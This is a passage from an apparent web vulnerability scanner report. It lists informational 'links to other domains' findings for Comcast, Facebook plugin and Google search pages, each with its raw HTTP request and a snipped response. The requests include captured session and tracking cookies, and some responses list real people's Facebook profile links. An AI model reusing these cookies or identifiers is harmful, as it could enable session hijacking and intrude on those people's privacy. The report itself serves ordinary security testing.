Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331726|PC#1315327839174-766376.19#1316539466|check#true#1315329926; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; fsr.a=1315329865492; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331665408%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329866001'%255D%255D%7C1473182666001%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331666014%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 18 Aug 2011 20:12:17 GMT
Accept-Ranges: bytes
ETag: "80e66e20e35dcc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:26 GMT
Connection: close
Content-Length: 28636

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><ti
...[SNIP]...
<LI><A href="http://www.comcastsupport.com/chat" target=_blank>Chat with a Comcast Customer Service Representative</A>
...[SNIP]...
<div id="footer" xmlns="">
           ©2011 Comcast
           | <a title="Investor Relations" href="http://www.cmcsk.com">Investor Relations</a>
...[SNIP]...

15.113. https://www.comcast.com/Localization/Localize.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; mbox=check#true#1315327900|session#1315327839174-766376#1315329700; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315329639203%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20gpv_07%3Doto%25202010%2520mvt%2520--%2520cdv02%7C1315330156032%3B; s_sess=%20s_cc%3Dtrue%3B%20cf%3D1%3B%20SC_LINKS%3Doto%25202010%2520mvt%2520--%2520cdv02%255E%255Eversion_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255Eoto%25202010%2520mvt%2520--%2520cdv02%2520%257C%2520version_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255E%3B%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_sq%3Dcomcastdotcomprod%253D%252526pid%25253Doto%252525202010%25252520mvt%25252520--%25252520cdv02%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.comcast.com%2525252Fshop%2525252Fbuyflow%2525252Fdefault.ashx%2525253FSourcePage%2525253DVOIP_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Tue, 06 Sep 2011 11:59:19 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24148
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...
<div id="main">
   
    <script src="https://secure.xfinity.com/js-api/compressed/xpbar.js?id=xbardiv&amp;highlight=comcastcom&amp;version=2" type="text/javascript">..</script>
...[SNIP]...

15.114. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.143.63
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:43 GMT
Content-Length: 15660

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="qvEJ";</scri
...[SNIP]...
</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_73c8e374e06c3a7d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="KTVI ... St. Louis: Stray Rescue Looking For A Poster Dog" href="http://www.myfitv.com/videos/1425263?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQAihlFIzrBbcHHG&amp;url=http%3A%2F%2Fcache.thenewsroom.com%2Fktvi%2F2011%2F09%2F03%2F27cf8413-933b-4ed4-ab52-d0e227bd3660_preview.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1425263?fb_ref=mod_fba_home" target="_blank">KTVI ... St. Louis: Stray Rescue Looking For A Poster Dog</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_69f2ddbc10bf9945"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Game On: Lafayette Jefferson vs. McCutcheon - 9/2/11" href="http://www.myfitv.com/videos/1425692?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDn8o3CVmyCPPAP&amp;url=http%3A%2F%2Ffitv-episodes.s3.amazonaws.com%2Ffrontier%2Fgame_on%2Flafayette_jefferson_89x90.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1425692?fb_ref=mod_fba_home" target="_blank">Game On: Lafayette Jefferson vs. McCutcheon - 9/2/11</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6c0693dd389133ea"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="WREG - Memphis: Impacting Culture for Christ" href="http://www.myfitv.com/videos/1418438?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQD9mu08dehnlv7w&amp;url=http%3A%2F%2Fcache.thenewsroom.com%2Fwreg%2F2011%2F08%2F30%2F825598fd-decb-4754-abd5-cebf604c73fe_preview.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1418438?fb_ref=mod_fba_home" target="_blank">WREG - Memphis: Impacting Culture for Christ</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4b1e1ef9a3cc4afc"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Arizona GOP Raising Funds With Tuscon Shooting Type of Gun" href="http://www.myfitv.com/videos/1423459?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCwDKcLl0sR3GsB&amp;url=http%3A%2F%2Fpthumbnails.5min.com%2F10343096%2F517154781_3.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1423459?fb_ref=mod_fba_home" target="_blank">Arizona GOP Raising Funds With Tuscon Shooting Type of Gun</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_652f9e335898a38c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="House of the Dead" href="http://www.myfitv.com/videos/248562?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBXZWprEKgvA9fN&amp;url=http%3A%2F%2Fthumbnails.hulu.com%2F591%2F50118591%2F233441_120x90_generated.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/248562?fb_ref=mod_fba_home" target="_blank">House of the Dead</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7a81470ee72ad2f6"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="The Invisible Life of Thomas Lynch" href="http://www.myfitv.com/videos/1395667?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQB1IeZSUlg5LPS1&amp;url=http%3A%2F%2Fecx.images-amazon.com%2Fimages%2FI%2F41DhHbBd-HL._SX120_SY90_.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1395667?fb_ref=mod_fba_home" target="_blank">The Invisible Life of Thomas Lynch</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_605c801b0ddbfe33"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Grace Potter &amp; The Nocturnals: Colors: San Diego Acoustic..." href="http://www.myfitv.com/videos/546673?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCiVmH7SbfvZ6Zn&amp;url=http%3A%2F%2Fthumbnails.hulu.com%2F213%2F50071213%2F185282_120x90_generated.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/546673?fb_ref=mod_fba_home" target="_blank">Grace Potter &amp; The Nocturnals: Colors: San Diego Acoustic...</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_62744de0780626b2"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="NBC TODAY Show: Fun, Hip Finds for Back-to-schoolers" href="http://www.myfitv.com/videos/1423873?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDlEXRAsBVA5vFU&amp;url=http%3A%2F%2Fthumbnails.hulu.com%2F186%2F40035186%2F40035186_120x90_generated.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1423873?fb_ref=mod_fba_home" target="_blank">NBC TODAY Show: Fun, Hip Finds for Back-to-schoolers</a>
...[SNIP]...

15.115. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fyahoorealestate&width=220&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.146.33
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:19 GMT
Content-Length: 8262

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/yahoorealestate" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161978_122391104495581_1192178_q.jpg" alt="Yahoo! Real Estate" /></a>
...[SNIP]...

15.116. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=210163452329780&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25493d93%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=254&href=http%3A%2F%2Fwww.facebook.com%2Fmyfitv&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.139.32
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:41 GMT
Content-Length: 12771

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/myfitv" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174851_415437630458_4636811_q.jpg" alt="My FiTV" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lovelyladylisah" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275469_100000531545003_5395527_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/garryw.edwards1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274816_100000247513812_5878761_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000205126235" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187558_100000205126235_1796686_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/stephen.zwack" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275055_1238460835_7560082_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000531761061" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275235_100000531761061_7560341_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1663962640" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/186032_1663962640_4186789_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276132_100000510304098_6754703_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001635776842" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275894_100001635776842_1267922_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275165_100000053147484_5755462_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000563499933" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276185_100000563499933_36507_q.jpg" alt="" /><div class="name">
...[SNIP]...

15.117. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=106890669355244&width=290&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.38
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:17 GMT
Content-Length: 8244

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/yahooshopping" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50335_106890669355244_5131_q.jpg" alt="Yahoo! Shopping" /></a>
...[SNIP]...

15.118. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=telephone+service HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:23 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 123043

<!doctype html> <head> <title>telephone service - Google Search</title> <script>window.google={kEI:"_whmTozPL-XfiAK88fWiCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute(
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=telephone+service&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.att.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CGQQFjAA')">AT&amp;T | Cell Phones, U-verse, Digital TV, DSL Internet, and <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:nchhCV8tJYIJ:www.att.com/+telephone+service&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CG0QIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.att.com/accounts/" onmousedown="return clk(this,this.href,'','','','1','','0CHAQ0gIoADAA')">Manage Your AT&amp;T Accounts</a> - <a href="http://www.wireless.att.com/cell-phone-service/cell-phones/index.jsp" onmousedown="return clk(this,this.href,'','','','1','','0CHEQ0gIoATAA')">Cell Phones, Smartphones, and ...</a> - <a href="http://www.att.com/econtactus/" onmousedown="return clk(this,this.href,'','','','1','','0CHIQ0gIoAjAA')">Contact Us</a>
...[SNIP]...
<h3 class="r"><a href="http://www.verizon.com/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CHgQFjAB')">Verizon | Broadband (DSL) Internet <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:HvcASfqqhcQJ:www.verizon.com/+telephone+service&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CHoQIDAB')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www22.verizon.com/myverizon/" onmousedown="return clk(this,this.href,'','','','2','','0CH0Q0gIoADAB')">MyVerizon 2.0</a> - <a href="http://www22.verizon.com/content/contactus/" onmousedown="return clk(this,this.href,'','','','2','','0CH4Q0gIoATAB')">Contact Us</a> - <a href="http://www22.verizon.com/residential/homephone/" onmousedown="return clk(this,this.href,'','','','2','','0CH8Q0gIoAjAB')">Phone</a> - <a href="http://www22.verizon.com/residential/highspeedinternet" onmousedown="return clk(this,this.href,'','','','2','','0CIABENICKAMwAQ')">High Speed Internet</a>
...[SNIP]...
<h3 class="r"><a href="http://www.centurylink.com/" class=l onmousedown="return clk(this,this.href,'','','','3','','0CIYBEBYwAg')">CenturyLink | Local Provider of High Speed Internet, <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ocAFxH1QXrIJ:www.centurylink.com/+telephone+service&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CIgBECAwAg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ooma.com/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CI8BEBYwAw')">Free Home <em>
